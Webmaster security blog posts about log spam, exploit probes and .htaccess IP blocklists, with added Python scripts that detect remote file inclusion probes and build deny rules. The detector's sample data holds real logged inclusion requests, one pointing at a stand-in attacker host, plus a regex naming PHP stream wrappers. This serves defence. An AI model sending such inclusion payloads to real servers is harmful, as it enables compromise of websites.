  3. A Welcome to cPanel or WHM screen
  4. A welcome screen for an unconfigured website hosted on a Windows IIS server
  5. A 403 Forbidden message (someone doesn't want me poking around)
  6. A message that no website has yet been configured on the server

Today, when I went to investigate the IP address that was spewing out 24 exploit attempts in one day, instead of one of the above listed typical responses, all I saw was a login field, requesting a user name and password. This is a password protected website and it is being used to exploit other websites and web servers. Nobody can access any of its pages, or inject hostile scripts into it, without logging in with the correct credentials. Maybe this server used a weak user name and password combination that was cracked with a dictionary or rainbow table attack, or maybe the administrator was tricked into allowing a keylogger to infect his or her personal computer (used to log in to his/her website), or maybe the owner is knowingly using this server to launch exploit attacks against other servers, like mine.

Whatever the case may be, this server is out to get us and if you run a website you may want to block it for your website's protection. I will give you several methods of denying access to this server and others launching similar exploits, in my extended comments.
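What the logged probes on this page have in common (this sIncPath request, and the Coppermine THEME_DIR requests in the November and July posts above) is a parameter whose value is a URL pointing at the attacker's file. Here is an added example, written for this page and not code from any of the posts or from Coppermine, that scans access-log lines for that pattern: it reads the query string of each request, flags parameters whose value is a remote URL or a PHP stream wrapper, and tallies probes per source address so that a threshold can feed a blocklist. The two Coppermine lines are the ones quoted in the posts; the sIncPath line keeps the quoted source IP but uses a constructed hostname in place of the one the post deliberately defanged. The threshold, the function names and the benign contrast line are this example's own.

```python
"""Detect remote file inclusion (RFI) probes in Apache access log lines.

Added example, not code from any of the posts or from Coppermine. The two
Coppermine lines are quoted from the posts; the sIncPath line uses a
constructed hostname; the threshold and function names are assumptions.
"""
import re
from collections import defaultdict
from urllib.parse import parse_qsl

REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)
# Values that make include($param) read code from somewhere other than the local theme directory.
REMOTE_VALUE_RE = re.compile(r'^(?:https?|ftp)://|^(?:php|data|expect)://', re.IGNORECASE)


def rfi_params(target):
    """[(name, value), ...] for query parameters whose value looks like a remote include."""
    query = target.partition("?")[2]
    pairs = parse_qsl(query, keep_blank_values=True)   # also percent-decodes the values
    return [(k, v) for k, v in pairs if REMOTE_VALUE_RE.match(v.strip())]


def scan(lines):
    """Per-IP probe count and the parameter names abused: {ip: {'probes': n, 'params': set}}."""
    report = defaultdict(lambda: {"probes": 0, "params": set()})
    for line in lines:
        m = REQUEST_RE.match(line)
        if m is None:
            continue
        found = rfi_params(m.group("target"))
        if found:
            entry = report[m.group("ip")]
            entry["probes"] += 1
            entry["params"].update(name for name, _ in found)
    return dict(report)


def ips_to_block(report, threshold=1):
    """Addresses whose probe count reaches the threshold, sorted for stable output."""
    return sorted(ip for ip, entry in report.items() if entry["probes"] >= threshold)


SAMPLE_LOG = [
    # quoted in the November 2009 and July 2009 posts above
    '70.85.136.34 - - [12/Nov/2009:06:30:02 -0800] "GET //modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://www.masuccessguy.com//audio/swf?? HTTP/1.1" 403 137 "-" "Mozilla/5.0"',
    '218.246.20.221 - - [17/Jul/2009:14:36:29 -0700] "GET //modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://example.com/gboard/rs/copyright.txt? HTTP/1.1" 403 137 "-" "Mozilla/5.0"',
    # the February 2009 line, with a constructed hostname instead of the defanged one
    '212.241.182.240 - - [01/Feb/2009:02:44:23 -0800] "GET /?sIncPath=http://attacker.example/mail/id1.txt?? HTTP/1.1" 403 137 "-" "Mozilla/5.0"',
    # constructed ordinary request for contrast
    '203.0.113.9 - - [01/Feb/2009:03:00:00 -0800] "GET /search?q=apache+htaccess HTTP/1.1" 200 2048 "-" "Mozilla/5.0 (Windows NT 6.1) Firefox/3.5"',
]

if __name__ == "__main__":
    report = scan(SAMPLE_LOG)
    for ip in ips_to_block(report):
        print(ip, report[ip]["probes"], sorted(report[ip]["params"]))
```

Applications that legitimately carry a URL in a parameter (a redirect target, for instance) will be flagged too, so treat a single hit as a prompt to read the log line, and reserve automatic blocking for repeated probes from one address, as in the 24-in-a-day case above. Because parse_qsl percent-decodes values, an attacker who encodes the scheme as "%68ttp://" is still caught.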

Continue reading "Block server script injection exploits targeting your websites" »


November 8, 2008

.htaccess blocklist addition for prolific access log spammer

Today I reviewed my daily access log for this website, and I discovered a large number of repeated attempts to spam my access log, all coming from the IP address: 64.182.124.212. The spam attempts were referrer field entries for a medical search engine and a social networking and dating website.

The IP address 64.182.124.212 belongs to a web hosting company known as CI Host, and is assigned to hosting customer PacificAir.com, an amateur looking website. The spamvertised websites in the referrer field look just as amateur as the PacificAir website and are hosted on the same server. The IP range assigned to CI Host is 64.182.0.0 through 64.182.255.255, or in CIDR notation: 64.182.0.0/16.

The way I respond to attempts to spam my access logs is that I place the offending IP address, and/or the CIDR of their hosting company, on my published IP blocklists. I did just that, placing the CIDR 64.182.0.0/16 on my Exploited Servers Blocklist. If you are getting spammed from the IP address 64.182.124.212 and want to block them in your .htaccess file, on your Apache hosted website, just add one of the following rule blocks:

<Files *>
order deny,allow
deny from 64.182.124.212
</Files>

If, like me, you decide to block the entire ISP/web hosting company, use this rule:

<Files *>
order deny,allow
deny from 64.182.0.0/16
</Files>

NOTE:
If you have your website hosted by CI Host please read the warning in my extended comments!
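The two rules above are hand-written. The following Python script is an added example (not code from this blog or from its blocklist pages) that builds the same <Files *> block from a list of addresses and CIDR ranges, merges overlapping or adjacent entries, emits the iptables equivalents that the blocklist landing page also offers, and tells you which entries a given client address would hit, including whether an "allow from" hole lets a client back in. The two real entries are the ones quoted above; the other entries in SAMPLE_ENTRIES and the port numbers are constructed for the demonstration.

```python
"""Build an Apache-style <Files *> deny block, and the iptables equivalent,
from single addresses and CIDR ranges, and check what a client would hit.

Added example, not code from the blog or its blocklist pages. The first two
entries are the ones quoted in the post; the rest are constructed."""
import ipaddress
from typing import Iterable, List, Union

Net = Union[ipaddress.IPv4Network, ipaddress.IPv6Network]

SAMPLE_ENTRIES = [
    "64.182.124.212          # the log spammer (from the post)",
    "64.182.0.0/16           # CI Host's whole allocation (from the post)",
    "203.0.113.0/25          # constructed: half of the TEST-NET-3 range",
    "203.0.113.128/25        # constructed: adjacent half, merges with the above",
    "2001:db8::/32           # constructed: documentation IPv6 prefix",
]


def parse_entries(entries: Iterable[str]) -> List[Net]:
    """Turn 'deny from' targets (bare IPs or CIDRs) into network objects.

    strict=False accepts a range written with host bits set (64.182.124.0/16)
    and normalises it to 64.182.0.0/16. '#' comments and blank lines are
    skipped; a malformed entry raises ValueError instead of being dropped,
    because Apache would answer a bad directive with a 500 for every visitor.
    """
    nets: List[Net] = []
    for raw in entries:
        text = raw.split("#", 1)[0].strip()
        if text:
            nets.append(ipaddress.ip_network(text, strict=False))
    return nets


def collapse(nets: Iterable[Net]) -> List[Net]:
    """Drop entries already inside a wider range and merge adjacent ranges,
    e.g. 64.182.124.212 disappears once 64.182.0.0/16 is listed."""
    nets = list(nets)
    v4 = [n for n in nets if n.version == 4]
    v6 = [n for n in nets if n.version == 6]
    return list(ipaddress.collapse_addresses(v4)) + list(ipaddress.collapse_addresses(v6))


def render_htaccess(nets: Iterable[Net], allow: Iterable[str] = ()) -> str:
    """Apache 2.2 syntax as used on the blocklist pages (Apache 2.4 accepts it
    through mod_access_compat; the 2.4-native form is 'Require not ip')."""
    lines = ["<Files *>", "order deny,allow"]
    for n in nets:
        single = n.prefixlen == n.max_prefixlen
        lines.append("deny from " + (str(n.network_address) if single else str(n)))
    # Under "order deny,allow" an allow line wins over any deny covering it:
    # this is how one customer inside a blocked range is let back in.
    for a in allow:
        lines.append("allow from " + a)
    lines.append("</Files>")
    return "\n".join(lines) + "\n"


def render_iptables(nets: Iterable[Net], ports: str = "80,443") -> str:
    """Host-firewall equivalent for the web ports (ports are an assumption)."""
    rules = []
    for n in nets:
        tool = "iptables" if n.version == 4 else "ip6tables"
        rules.append(f"{tool} -A INPUT -s {n.with_prefixlen} -p tcp "
                     f"-m multiport --dports {ports} -j DROP")
    return "\n".join(rules) + "\n"


def matching_entries(client: str, nets: Iterable[Net]) -> List[Net]:
    """Every entry that covers the client address: confirms a block works, and
    finds the range that is locking out a legitimate visitor."""
    addr = ipaddress.ip_address(client)
    return [n for n in nets if n.version == addr.version and addr in n]


def is_blocked(client: str, nets: Iterable[Net], allow: Iterable[str] = ()) -> bool:
    """Apache's verdict under "order deny,allow": denied only if some deny
    entry covers the client and no allow entry does."""
    addr = ipaddress.ip_address(client)
    allowed = any(a.version == addr.version and addr in a for a in parse_entries(allow))
    return bool(matching_entries(client, nets)) and not allowed


if __name__ == "__main__":
    merged = collapse(parse_entries(SAMPLE_ENTRIES))
    print(render_htaccess(merged))
    print(render_iptables(merged))
    print("64.182.124.212 hits:", matching_entries("64.182.124.212", merged))
```

Run it and paste the printed <Files *> block into .htaccess. Collapsing is worth doing before publishing a long list: Apache evaluates every deny line on every request, and a single /16 is cheaper than the same range plus dozens of its own hosts listed separately.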

Continue reading ".htaccess blocklist addition for prolific access log spammer" »


July 7, 2008

Stupid Russian Blog Spammers Still Wasting Their Time

"Stupid Russian Blog Spammers Still Wasting Their Time" makes for a catchy, surreal title, but it's true. The same country that produced the brilliant criminal masterminds behind the Storm and Grisbi Worms has also produced some of the stupidest blog spammers to ever set finger to keyboard!

Let me explain what I am referring to regarding stupid blog spammers. First of all, look up in the upper right corner of this blog, just under the Google search field. Here's what it says in capital letters: "SORRY: NO COMMENTS, NO TRACKBACKS!" That should be self explanatory to almost anybody who can read English words, including people intent on spamming a blog such as this one, using English words. You know the crap I'm talking about; links to buy unlicensed or illegal drugs or herbal solutions, to cure "ED" or enlarge one's "natural size." When I first started this blog I did allow trackbacks and comments and that is what I was getting submitted, all in English and all traced to Russian and Ukrainian IP addresses.

As soon as I realized that only blog spammers were trying to comment on my blog I decided to disable the codes and modules that allowed comments and trackbacks. Still, these idiots in Russia and the Ukraine continued trying to POST comments and trackbacks to the now disabled modules that used to handle those functions. This led me to write three articles about these incidents, during the spring and summer of 2007. Their names and links to them are as follows:


  1. Stupid Blog Trackback Spammers Don't Understand Server 403 Responses
  2. Russian and Ukrainian Blog Spammers are STUPID!
  3. Blog spammers still wasting their time trying to spam this unspammable blog

I wrote those articles about a year ago, yet, I still see daily access log entries being blocked with server 403 responses, belonging to Russian IP addresses trying to POST spam comments or Trackbacks to this blog. It is obvious that these spammers are using scripts, but, being stupid spammers they don't bother to verify if those scripts are being allowed to complete their submissions, or check my blog to see if their comments were even posted. I'll bet somebody is paying these idiots to send blog spam for them and they are ripping off the guys with the money. If my blog is any indication of their lack of any level of intelligence, then I am guessing that they are having a similar lack of success trying to spam your blogs. Still, some of their attempts may work on unsecured servers.

Anyway, insults to the enemy aside (it feels good though!), I never see the comments they are typing, just an access log entry containing a 403 Forbidden, or 302 redirect back to their own websites (lol). My Apache-based, shared-hosting web server is protected with a custom ".htaccess" file that contains my entire, now-famous, "Russian Blocklist!" Many webmasters are using this blocklist to keep Russian and Turkish spammers and hackers from accessing their web sites.

If your web site and blog is hosted on a shared Apache/Linux based web server and you want to block access to IP addresses in the former Soviet Union and Turkey, just download my Russian .Htaccess Blocklist and either use it as your new .htaccess file, or merge the "deny from" list into your existing .htaccess. Full instructions are included on my .htaccess blocklists landing page and on each blocklist page. The landing page has links to all of my existing .htaccess IP blocklists (Chinese, Nigerian, Russian and Exploited Servers), as well as my iptables Linux firewall blocklist equivalents.

An actual access log entry and codes you can use to block web site access to these people, are in my extended content.

Continue reading "Stupid Russian Blog Spammers Still Wasting Their Time" »


May 22, 2008

Steel Guitar Forum Goes Offline Temporarily

On May 19, 2008, the external RAID hard disk unit behind the popular website The Steel Guitar Forum (SGF) suffered a catastrophic failure, taking the entire website offline. It remains offline as of May 22, 2008, while a new RAID setup is being installed and data recovery attempted. We are hoping to have the server back online as soon as possible, with as little data loss as possible. As many of you already know, I do security for the SGF and act as moderator of the "Computers" section of the forum. I have assisted the owner/administrator, Bobby Lee Quasar, in procuring a suitable replacement.

The Steel Guitar Forum is a (paid) members-only community of over 4000 professional and amateur pedal and non-pedal steel guitarists located around the world. Most of the world's top steel players are members of this community, where information, techniques and music business discussions take place on a daily basis, as well as the exchange of equipment. For many of these members this website is their primary destination on the Internet, and I know that they are missing its presence during this outage. We are doing everything we can to get the SGF back online. In the meantime I recommend that all affected steel guitarists spend some extra time practicing their instruments!

The SGF is back online, as of the afternoon of May 23.
As it turned out, both Western Digital hard disks in the WD MyBook Pro Edition II external RAID enclosure failed at the same time! A two-disk mirror in a single enclosure shares one power supply and one controller, so it protects against a single disk failing but not against whatever takes both disks down together; it is no substitute for a separate backup.


March 24, 2008

Russian connection to user agent "WordPress/2.1.1" in website access logs

I read the access logs for my website every day, and sometimes I see something that jumps out and grabs my attention as not right. This month, that something is a series of attempts to fetch various pages on my blog in an unusual manner, with a very unusual user agent: WordPress/2.1.1

At first I thought that somebody was just trying to pick up my MovableType RSS feed, but that is not what they are after. So I did a little research on "WordPress/2.1.1" and learned that it is the version of the popular WordPress PHP blogging software whose download package on wordpress.org was tampered with by a hacker back in March 2007 to include a backdoor; WordPress promptly replaced it with version 2.1.2. I suppose there may be some WordPress users who haven't heard that this version was backdoored and haven't bothered to check for updates, but the log entries I am seeing are not from a WordPress blog. I decided to do a little investigating, which is something I am good at. So, I followed the IP addresses to see from whence they came.

What I have learned so far about the visitors whose requests carry the user agent "WordPress/2.1.1" is that (A) they come at me with no "Referer" field entry, (B) they always GET a blog article and immediately follow it with a HEAD request, and (C) they change IP addresses after getting my 403 (Forbidden) response and try again. Switching IP addresses gets them nowhere, since I am also blocking them by their User-Agent string.

Let's take a look at the access log entries for this user agent (stretch out or maximize your browser):

67.228.198.50 - - [02/Mar/2008:00:58:01 -0700] "GET /blogs/2008/02/my_spam_analysis_for_february_18_24_2008.html HTTP/1.1" 403 350 "-" "WordPress/2.1.1"
67.228.198.50 - - [02/Mar/2008:01:04:52 -0700] "HEAD /blogs/2008/02/my_spam_analysis_for_february_11_17_2008.html HTTP/1.1" 403 238 "-" "WordPress/2.1.1"

69.50.177.18 - - [13/Mar/2008:12:06:49 -0600] "GET /blogs/2008/03/2wire_modem_dns_poisoning_attack_returns_to.html HTTP/1.1" 403 351 "-" "WordPress/2.1.1"
69.50.177.18 - - [13/Mar/2008:12:07:14 -0600] "HEAD /blogs/2008/03/2wire_modem_dns_poisoning_attack_returns_to.html HTTP/1.1" 403 238 "-" "WordPress/2.1.1"

83.222.14.129 - - [23/Mar/2008:16:52:57 -0600] "GET /blogs/2008/03/windows_vista_sp1_released_some_driver_probl.html HTTP/1.1" 403 269 "-" "WordPress/2.1.1"
83.222.14.129 - - [23/Mar/2008:16:52:57 -0600] "HEAD /blogs/2008/03/windows_vista_sp1_released_some_driver_probl.html HTTP/1.1" 403 236 "-" "WordPress/2.1.1"

89.108.85.75 - - [23/Mar/2008:16:52:38 -0600] "GET /blogs/2008/03/windows_vista_sp1_released_some_driver_probl.html HTTP/1.1" 403 269 "-" "WordPress/2.1.1"
89.108.85.75 - - [23/Mar/2008:16:53:08 -0600] "HEAD /blogs/2008/03/windows_vista_sp1_released_some_driver_probl.html HTTP/1.1" 403 236 "-" "WordPress/2.1.1"

91.192.116.2 - - [23/Mar/2008:18:56:59 -0600] "GET /blogs/2008/03/windows_vista_sp1_released_some_driver_probl.html HTTP/1.1" 403 269 "-" "WordPress/2.1.1"
91.192.116.2 - - [23/Mar/2008:18:57:14 -0600] "HEAD /blogs/2008/03/windows_vista_sp1_released_some_driver_probl.html HTTP/1.1" 403 236 "-" "WordPress/2.1.1"

216.255.185.178 - - [24/Mar/2008:10:15:07 -0600] "GET /blogs/2008/03/followup_article_about_windows_vista_sp1_rel.html HTTP/1.1" 403 269 "-" "WordPress/2.1.1"
216.255.185.178 - - [24/Mar/2008:10:15:22 -0600] "HEAD /blogs/2008/03/followup_article_about_windows_vista_sp1_rel.html HTTP/1.1" 403 236 "-" "WordPress/2.1.1"

These are definitely not typical access log entries, and not something a normal search engine or human visitor would do. WordPress is blog software that gets installed on web servers; it is not a browser. A user agent is the string a browser, search engine or robot sends to identify itself. A genuine WordPress installation does identify itself as "WordPress/<version>" when it fetches feeds, which is why the string looks harmless at first glance, but a real install has no reason to GET and then HEAD my HTML article pages. Despite the diversity of IP addresses, these visits are not unrelated. Read my extended comments to see where these IP addresses are allocated and my conclusions about their source and probable intent.
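Added example (not code from this post): a small Python detector for the pattern just described, run over the log lines quoted above. It parses Apache's combined log format, groups requests carrying the WordPress/2.1.1 user agent by address, flags an address when every one of its requests had an empty Referer and a GET was followed by a HEAD, and renders the user-agent block the post mentions as an .htaccess rule. SAMPLE_LINES holds the twelve lines from the post plus two constructed lines (an ordinary Firefox visitor and a lone feed fetch) that the check must not flag.

```python
"""Detect the "WordPress/2.1.1" probe pattern from the post in an Apache
combined-format access log: that exact User-Agent, an empty Referer ("-"),
and a GET for an article followed by a HEAD from the same address.

Added example, not code from the blog. The regex follows Apache's standard
"combined" LogFormat; SAMPLE_LINES mixes the post's lines with constructed ones."""
import re
from collections import defaultdict
from typing import Dict, Iterable, List, NamedTuple, Optional, Set

COMBINED = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\d+|-) '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"\s*$'
)
PROBE_UA = "WordPress/2.1.1"


class Hit(NamedTuple):
    ip: str
    ts: str
    method: str
    path: str
    status: int
    referer: str   # "-" means the request carried no Referer header
    ua: str


def parse_line(line: str) -> Optional[Hit]:
    """Parse one combined-format line; None for blank or foreign lines."""
    m = COMBINED.match(line.strip())
    if not m:
        return None
    return Hit(m["ip"], m["ts"], m["method"], m["path"],
               int(m["status"]), m["referer"], m["ua"])


def hits_by_ip(lines: Iterable[str], ua: str = PROBE_UA) -> Dict[str, List[Hit]]:
    """Requests carrying the given User-Agent, grouped by address in log order."""
    groups: Dict[str, List[Hit]] = defaultdict(list)
    for line in lines:
        hit = parse_line(line)
        if hit and hit.ua == ua:
            groups[hit.ip].append(hit)
    return dict(groups)


def is_get_then_head(hits: List[Hit]) -> bool:
    """The signature from the post: no Referer on any request, and a GET
    followed (not necessarily for the same path) by a HEAD."""
    seen_get = False
    for hit in hits:
        if hit.referer != "-":
            return False
        if hit.method == "GET":
            seen_get = True
        elif hit.method == "HEAD" and seen_get:
            return True
    return False


def probe_sources(lines: Iterable[str]) -> Set[str]:
    """Addresses whose traffic matches the full pattern."""
    return {ip for ip, hits in hits_by_ip(lines).items() if is_get_then_head(hits)}


def htaccess_ua_block(ua: str = PROBE_UA) -> str:
    """Apache 2.2-style rule (mod_setenvif + mod_authz_host) denying the
    User-Agent outright, so hopping between addresses stops mattering."""
    pattern = "^" + re.escape(ua) + "$"
    return (f'SetEnvIfNoCase User-Agent "{pattern}" bad_ua\n'
            "<Files *>\norder allow,deny\nallow from all\ndeny from env=bad_ua\n</Files>\n")


SAMPLE_LINES = [
    # the twelve lines quoted in the post
    '67.228.198.50 - - [02/Mar/2008:00:58:01 -0700] "GET /blogs/2008/02/my_spam_analysis_for_february_18_24_2008.html HTTP/1.1" 403 350 "-" "WordPress/2.1.1"',
    '67.228.198.50 - - [02/Mar/2008:01:04:52 -0700] "HEAD /blogs/2008/02/my_spam_analysis_for_february_11_17_2008.html HTTP/1.1" 403 238 "-" "WordPress/2.1.1"',
    '69.50.177.18 - - [13/Mar/2008:12:06:49 -0600] "GET /blogs/2008/03/2wire_modem_dns_poisoning_attack_returns_to.html HTTP/1.1" 403 351 "-" "WordPress/2.1.1"',
    '69.50.177.18 - - [13/Mar/2008:12:07:14 -0600] "HEAD /blogs/2008/03/2wire_modem_dns_poisoning_attack_returns_to.html HTTP/1.1" 403 238 "-" "WordPress/2.1.1"',
    '83.222.14.129 - - [23/Mar/2008:16:52:57 -0600] "GET /blogs/2008/03/windows_vista_sp1_released_some_driver_probl.html HTTP/1.1" 403 269 "-" "WordPress/2.1.1"',
    '83.222.14.129 - - [23/Mar/2008:16:52:57 -0600] "HEAD /blogs/2008/03/windows_vista_sp1_released_some_driver_probl.html HTTP/1.1" 403 236 "-" "WordPress/2.1.1"',
    '89.108.85.75 - - [23/Mar/2008:16:52:38 -0600] "GET /blogs/2008/03/windows_vista_sp1_released_some_driver_probl.html HTTP/1.1" 403 269 "-" "WordPress/2.1.1"',
    '89.108.85.75 - - [23/Mar/2008:16:53:08 -0600] "HEAD /blogs/2008/03/windows_vista_sp1_released_some_driver_probl.html HTTP/1.1" 403 236 "-" "WordPress/2.1.1"',
    '91.192.116.2 - - [23/Mar/2008:18:56:59 -0600] "GET /blogs/2008/03/windows_vista_sp1_released_some_driver_probl.html HTTP/1.1" 403 269 "-" "WordPress/2.1.1"',
    '91.192.116.2 - - [23/Mar/2008:18:57:14 -0600] "HEAD /blogs/2008/03/windows_vista_sp1_released_some_driver_probl.html HTTP/1.1" 403 236 "-" "WordPress/2.1.1"',
    '216.255.185.178 - - [24/Mar/2008:10:15:07 -0600] "GET /blogs/2008/03/followup_article_about_windows_vista_sp1_rel.html HTTP/1.1" 403 269 "-" "WordPress/2.1.1"',
    '216.255.185.178 - - [24/Mar/2008:10:15:22 -0600] "HEAD /blogs/2008/03/followup_article_about_windows_vista_sp1_rel.html HTTP/1.1" 403 236 "-" "WordPress/2.1.1"',
    # constructed: an ordinary visitor arriving from a search engine; must not be flagged
    '10.0.0.1 - - [24/Mar/2008:10:20:00 -0600] "GET /blogs/2008/03/followup_article_about_windows_vista_sp1_rel.html HTTP/1.1" 200 18432 "http://www.google.com/search?q=vista+sp1" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12"',
    # constructed: a lone feed fetch with the same UA and no HEAD; must not be flagged
    '10.0.0.2 - - [24/Mar/2008:10:21:00 -0600] "GET /blogs/atom.xml HTTP/1.1" 200 5120 "-" "WordPress/2.1.1"',
]

if __name__ == "__main__":
    print(sorted(probe_sources(SAMPLE_LINES)))
    print(htaccess_ua_block())
```

The user-agent rule is the one that actually stops the address hopping; feed it the raw log (for example `probe_sources(open("access_log"))`) to get the list of addresses for the IP blocklist as well.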

Continue reading "Russian connection to user agent "WordPress/2.1.1" in website access logs" »


January 28, 2008

Russian & Exploited Servers Blocklist is now two blocklists

Prelude:
For the last couple of years I have been compiling and publishing lists of IP addresses belonging to ISPs and commercially hosted web servers in various parts of the world, from which unwanted spam, scams and server hacking attempts emanate. These lists are compiled in a format recognized by Apache web servers: <Files *> sections containing "deny from" directives (rules). They include both individual IP addresses and ranges of addresses belonging to web hosts, server farms and ISPs, written in CIDR notation (for example 64.182.0.0/16). A group of these blocked addresses and ranges, compiled into one file, is a "blocklist," sometimes mislabeled a "blacklist."

My blocklists can be used in at least two different Apache configuration files: httpd.conf (requires root access to the server, as on a dedicated server) and .htaccess (used on shared hosting accounts). All of my blocklists are written for private .htaccess files that go into the web root (e.g. public_html), or into individual folders, of an Apache-hosted website. If your web host allows .htaccess overrides (AllowOverride) for individual websites, you can use any of my blocklists. Instructions are found on each page, in comments like this:

# Here is a sample comment as used in a .htaccess file.
# The # sign causes Apache to ignore the rest of this line

The Changes:
I can see from reading my Change Detection reports that a lot of webmasters are using my .htaccess blocklists. Those of you who are using my Russia and Exploited Servers Blocklist need to be aware that it has just been split into two new files. One deals just with ISP's and servers located in the former Soviet Union and Turkey, while the other deals with exploited servers owned by various web hosts and co-location server farms and data centers, in various countries (especially here in the good old USA!). The descriptions of these two blocklists are as follows...

The New Files:
The new Russian Blocklist is now located at www.wizcrafts.net/russian-blocklist.html and contains IP addresses and CIDR ranges traced to Russia, The Ukraine, Bulgaria, Romania, Estonia, Latvia and Turkey. I included Turkey in this blocklist because I get tons of spam coming through various ISPs in that country (e.g. Turk Telecom), plus numerous server redirection exploit attempts. Basically, the Russian Blocklist is comprised of ISPs, with some web hosting companies thrown in, located in Russia or these other Eastern Bloc countries. Most of the traffic I see from these sources is blog, access log and email spam, with the occasional server exploit attempt against my website. New IP addresses and CIDR ranges are added to this blocklist as I analyze spam sources or trace log/blog spam attempts (all unsuccessful, due to my security measures and filters) to countries covered by this file.

The new Exploited Servers Blocklist is located at www.wizcrafts.net/exploited-servers-blocklist.html and contains long "deny from" lists covering various types of web hosting and dedicated server companies whose machines are running, have run, or might try to run hostile code against my website, spam my access logs, bypass my security measures, or steal my traffic via proxy services. All of these are hostile actions, and in my experience they are conducted by criminals and criminal organizations. This blocklist is growing rapidly as I see and trace exploit attempts against my server.

Conclusion:
If you have been using my previous file - russia+exploited-server-blocklist.html - please change your bookmarks to point to one, or both of the new files that have replaced it. Here is a list of my current .htaccess blocklists, as of this posting:

Exploited Servers Blocklist | Russian Blocklist | Nigerian Blocklist | Chinese-Korean Blocklist


August 29, 2007

Blog spammers still wasting their time trying to spam this unspammable blog

Sometimes people who you'd think know what they're doing are just so completely clueless that it makes me laugh! I am referring to Blog spammers; the guys in Russia, The Ukraine, Estonia and other parts of the former Soviet Union, who relentlessly pound away at their keyboards, sending comment and trackback spam messages to every MovableType blog they can locate. They must assume that most of these blogs accept these comments and blindly publish them, because they keep trying to post spam messages to MT blogs, linking back to their spamvertised websites hawking various drugs, or pornography.

Well, I for one don't allow any comments or trackbacks on my blog. It says so in plain, bold English and Russian words, at the top-right of every blog page, and in all of my blog search results pages. Look under the Google Search box, at the top right of this page, and you'll plainly see where it says:

SORRY: NO COMMENTS, NO TRACKBACKS
КОММЕНТАРИИ и TRACKBACKS ВЫКЛЮЧЕНЫ и НЕ ИЗДАНЫ! (Russian: comments and trackbacks are switched off and not published!)

Now, if I was wanting to spam this blog and I read that, I'd move along to an easier target and not waste my time on this one. Yet, when I read my server access logs I see that somebody keeps trying to post comments and trackbacks to specific articles in my archives (all of which get a server 403 response), then tries to search for them on the pages to which they were targeted. However, since I don't want any comments or trackbacks I have deleted the Perl files that handle them and disabled those functions in my global settings. Heck, I have even stripped out all the codes referring to trackbacks from my page templates. Even I can't post a trackback on this blog!

Since these spam comments never reach my blog, when the idiots who try to post them search for them on the target pages, nothing is found matching those spam terms. Boris the Spammer needs to get a life or find less secure targets to pester. Instead, he plugs away fruitlessly on this blog, filling my access logs with all kinds of new IP addresses for me to add to my ever-growing Russian Blocklist.

Countless webmasters are using my Russia+Exploited Servers Blocklist. Most of the IP addresses in the Russian blocklist are gathered from my own raw access logs, from stupid blog spammers who evidently can't read the English or Russian notice that I don't allow comments or trackbacks.

If you have a blog or forum that is getting scammed by Nigerians or spammed by Russians, one or more of my .htaccess blocklists may help you get rid of these leeches. Note that they only work on Apache web servers, unless your Windows server has the ISAPI_Rewrite module installed by the company leasing the server space to you. You can use my Webmaster Contact page to hire me as a consultant to help keep scammers and spammers off your website.


August 4, 2007

Stupid Blog Trackback Spammers Don't Understand Server 403 Responses

The title of this article tells it all: "Stupid Blog Spammers Don't Understand Server 403 Responses!" Many months ago I discovered that although comments and trackbacks were not being posted to my blog, due to automatic moderation and classification of them as spam, nonetheless they kept on a-comin'. The comments spammers gave up a couple of months ago when they searched my blog only to learn that their bullshit comments had not been posted and never would be (I told them so on the search results page). However, the idiots who are trying to post trackback spam messages don't bother to search the blogs they are posting to, nor do they apparently read the responses sent by the script they are aimed at. If they did all they would see from my blog is a steady stream of server 403 responses; "Access Denied!" I don't even have the comments or trackbacks Perl modules installed anymore, so even I can't post comments or trackbacks to my own blog! I removed them when it became obvious that only spammers were commenting or tracking back.

If you run a MovableType blog and don't care to allow comments or trackbacks, yet you are seeing numerous attempts to spam your blog (in the list of junk comments and trackbacks), you can do what I did and disable them altogether, then delete or rename the files used to post these comments. To disable them in MovableType, log into your MT installation, then click on the left sidebar item "Settings" then click on the "New Entry Defaults" tab, then under "Default settings for new entries" uncheck both "Accept Comments" and "Accept Trackbacks," then scroll down to the bottom of the page and click on the "Save Changes" button. This will remove the Comments and Trackbacks links under all of your posts. You may still have to manually remove existing comments and trackbacks from old topics, or delete the old topics entirely if they have a lot of useless commenting in them.

Even after you have disabled comments, spammers may still try to go straight to the Perl scripts that handle comments and trackbacks, bypassing the settings you chose. To prevent this, remove these two files from the standard MT installation, found under the CGI folder (typically cgi-bin/MT/):
mt-comments.cgi
mt-tb.cgi

Without those files nobody can POST a spam comment or trackback to your blog, and you cannot accidentally re-enable comments or trackbacks unless you upgrade or put those files back. Prefer moving the files outside the web-accessible tree to renaming them in place: in a cgi-bin directory set up with ScriptAlias (the usual arrangement) every file is treated as an executable script whatever its name, so a renamed copy can still be run by anybody who guesses the new name. Note also that a request for a script that no longer exists gets a 404 Not Found; the 403 Forbidden responses described above come from the access rules in my .htaccess file, not from the missing scripts.

As I said in the beginning these spammers are not reading the results of their attempted trackback messages (success or failure), thus they are probably using automated scripts to send them out blindly from a spam list supplied to them by somebody even dumber than they are, without any concern about success or failure of their efforts. If you run your blog on an Apache hosted web server and want to deny access to these assholes read the technical details in my extended comments.

Continue reading "Stupid Blog Trackback Spammers Don't Understand Server 403 Responses" »


August 3, 2007

Block spammers, scammers and hackers with our .htaccess blocklists

There are millions of websites that host blogs and/or forums and many of them are targeted by scammers, spammers and hackers. Webmasters everywhere are searching for solutions to these problem-causing individuals and scripts. Some of you already know that I can help you block this unwanted traffic from your websites, but a great many more may just be discovering this fact. If your website, or blog, or forum is hosted on an Apache web server, and your hosting allows personal .htaccess overrides, read on.

